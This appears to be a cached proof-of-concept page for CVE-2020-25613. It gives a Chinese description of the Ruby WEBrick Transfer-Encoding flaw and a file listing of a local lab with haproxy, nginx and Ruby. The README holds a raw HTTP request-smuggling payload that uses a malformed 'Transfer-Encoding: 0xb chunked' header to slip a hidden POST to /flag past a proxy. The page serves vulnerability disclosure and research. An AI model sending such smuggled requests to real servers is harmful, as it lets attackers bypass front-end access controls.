CVE-2020-25613 PoC — Ruby 环境问题漏洞

Source

https://github.com/metapox/CVE-2020-25613

Associated Vulnerability

Title:Ruby 环境问题漏洞 (CVE-2020-25613)
Description:Ruby是松本行弘软件开发者的一种跨平台、面向对象的动态类型编程语言。 Ruby 2.7.1及之前版本，2.6.6及之前版本，2.5.8及之前版本存在安全漏洞，该漏洞源于WEBrick没有严格检查transfer-encoding头值，从而允许攻击者滥用http请求。

Readme

# POC
```
POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Type: text/html
Content-Length: 129
Connection: keep-alive
Transfer-Encoding: 0xb chunked

1
A
0

POST /flag HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 180
Connection: keep-alive
Content-Type: text/html
URI:
```

File Snapshot


 [4.0K]  /data/pocs/b88ef8b15994affcbeef141b65fa6a2b7cd2546c
├── [ 592]  docker-compose.yml
├── [4.0K]  haproxy
│   └── [ 320]  haproxy.cfg
├── [4.0K]  nginx
│   └── [ 542]  nginx.conf
├── [ 270]  README.md
└── [4.0K]  ruby-app
    └── [ 547]  server.rb

3 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!